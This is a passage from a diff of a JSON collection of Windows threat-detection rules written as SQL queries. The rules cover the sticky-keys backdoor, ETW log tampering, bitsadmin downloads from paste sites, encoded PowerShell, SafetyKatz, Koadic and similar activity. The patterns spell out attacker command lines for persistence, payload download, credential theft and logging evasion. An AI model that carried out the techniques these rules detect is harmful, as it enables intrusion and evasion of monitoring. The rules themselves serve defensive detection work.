ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Potential 
Binary Impersonating Sysinternals Tools", - "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "title": "Suspicious Extexport Execution", + "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", "status": "experimental", - "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "description": "Extexport.exe loads dll and is execute from other folder the original path", "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\portmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regjump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" ], - "filename": "proc_creation_win_sysinternals_tools_masquerading.yml" + "filename": "proc_creation_win_lolbin_extexport.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "title": "Rundll32 InstallScreenSaver Execution", + "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", "tags": [ - "attack.t1546.008", - 
"attack.privilege_escalation" + "attack.t1218.011", + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Legitimate installation of a new screensaver" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", - "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", + "title": "Remote Access Tool - LogMeIn Execution", + "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" ], - "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" + "filename": "proc_creation_win_remote_access_tools_logmein.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", - "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Some legitimate apps use this, but limited." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE 
'%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ "attack.execution", - "attack.t1055.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_apt_taidoor.yml" - }, - { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", - "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE 
'%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_other_bearlpe.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "RunDLL32 Spawning Explorer", - "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", "status": "experimental", - "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", - "author": "elhoim, CD_ROM_", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. 
As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_rundll32_spawn_explorer.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2022-29072 Exploitation Attempt", - "id": "9a4ccd1a-3526-4d99-b980-9f9c5d3a6ee3", - "status": "experimental", - "description": "Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability.\n7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. 
This is caused by misconfiguration of 7z.dll and a heap overflow.\nThe command runs in a child process under the 7zFM.exe process.\n", - "author": "frack113", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", + "status": "test", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "cve.2022.29072" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND ParentProcessName LIKE '%\\\\7zFM.exe' ESCAPE '\\') AND NOT (((CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% /k %' ESCAPE '\\' OR CommandLine LIKE '% /r %' ESCAPE '\\')) OR (CommandLine = '')))" - ], - "filename": "proc_creation_win_exploit_cve_2022_29072_7zip.yml" - }, - { - "title": "HackTool - SafetyKatz Execution", - "id": "b1876533-4ed5-4a83-90f3-b8645840a413", - "status": "experimental", - "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", - "author": "Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.credential_access", - "attack.t1003.001" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], + "filename": "proc_creation_win_hktl_koadic.yml" + }, + { + "title": "Powershell Inline Execution From A File", + "id": "ee218c12-627a-4d27-9e30-d6fb2fe22ed2", + "status": "experimental", + "description": "Detects inline execution of PowerShell code from a file", + "author": "frack113", "falsepositives": [ - "Unlikely" + 
"Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SafetyKatz.exe' ESCAPE '\\' OR OriginalFileName = 'SafetyKatz.exe' OR Description = 'SafetyKatz'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%iex %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command %' ESCAPE '\\' OR CommandLine LIKE '%icm %' ESCAPE '\\') AND (CommandLine LIKE '%cat %' ESCAPE '\\' OR CommandLine LIKE '%get-content %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\') AND CommandLine LIKE '% -raw%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_safetykatz.yml" + "filename": "proc_creation_win_powershell_exec_data_file.yml" }, { - "title": "Windows Defender Download Activity", - "id": "46123129-1024-423e-9fae-43af4a0fa9a5", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", "status": "test", - "description": "Detect the use of Windows Defender to download payloads", - "author": "Matthew Matchen", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. 
As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%MpCmdRun.exe%' ESCAPE '\\' OR Description = 'Microsoft Malware Protection Command Line Utility') AND (CommandLine LIKE '%DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%url%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_mpcmdrun_download.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "WMI Persistence - Script Event Consumer", - "id": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", "status": "test", - "description": "Detects WMI script event consumers", - "author": "Thomas Patzke", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.persistence", "attack.privilege_escalation", - "attack.t1546.003" + "attack.t1543.003" ], "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - 
